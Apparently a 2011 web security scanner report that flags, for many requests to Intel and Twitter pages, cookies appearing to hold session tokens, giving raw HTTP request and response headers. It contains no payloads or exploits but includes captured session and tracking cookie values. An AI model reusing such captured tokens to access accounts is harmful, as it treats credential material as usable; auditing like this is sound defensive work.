The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/academic_showcase/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /EricMMartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:34 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086 ETag: "b0c81407bf609b9b1cf953048b1105ab" Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT X-Runtime: 0.00598 Content-Type: text/html; charset=utf-8 Content-Length: 58433 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intel HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:35 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399 ETag: "3f5b73f849632157648b0cfb3f55a625" Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT X-Runtime: 0.00573 Content-Type: text/html; charset=utf-8 Content-Length: 57222 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intelnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:36 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534 ETag: "5ef92426ebdf2d0090dae9af07327303" Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT X-Runtime: 0.00428 Content-Type: text/html; charset=utf-8 Content-Length: 50405 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 403 Forbidden Date: Sat, 05 Feb 2011 23:22:38 GMT Server: hi Status: 403 Forbidden X-Transaction: Sat Feb 05 23:22:38 +0000 2011-20811-53000 Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948158732884; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBRhIvgtAToHaWQiJTYzNjY1ZmI2MzZkY2Iz%250AYjIyM2Y1ZDA2MTMwN2NiMTYwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--686e305c212123b2dc28c72a24dcf76ac929959b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?iid=gg_about+home_intc HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alerts.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A06%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /analystCenter.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /annuals.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A36%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:36 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /briefcase.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A09%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40579%2E7605208;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:10 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/download/download.cfm?CompanyID=INTC&FileID=361738&FileKey=f79153d7-eceb-4b38-8a7e-e2917f999659&FileName=_0008_virtual_1.jpg HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intc.com/index.cfm?iid=ftr+invrel Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 05 Feb 2011 23:14:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A15%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:15 GMT;path=/ location: http://files.shareholder.com/downloads/INTC/1158415371x0x361738/f79153d7-eceb-4b38-8a7e-e2917f999659/_0008_virtual_1.jpg Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/download/download.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 05 Feb 2011 23:15:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: X_SESSION=1158416520%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C5E03233E5E00EFF0D4D7E6B4BD7D2167;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/ Set-Cookie: X_BRIEFCASE=UPDATED%7C40489%2E7610995;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/ Set-Cookie: X_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:59 GMT;path=/ location: http://files.shareholder.com/downloads/x/1158416520x0x// Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/mobile/?CompanyID=INTC HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactUs.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A52%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /corpInfo.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /education.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
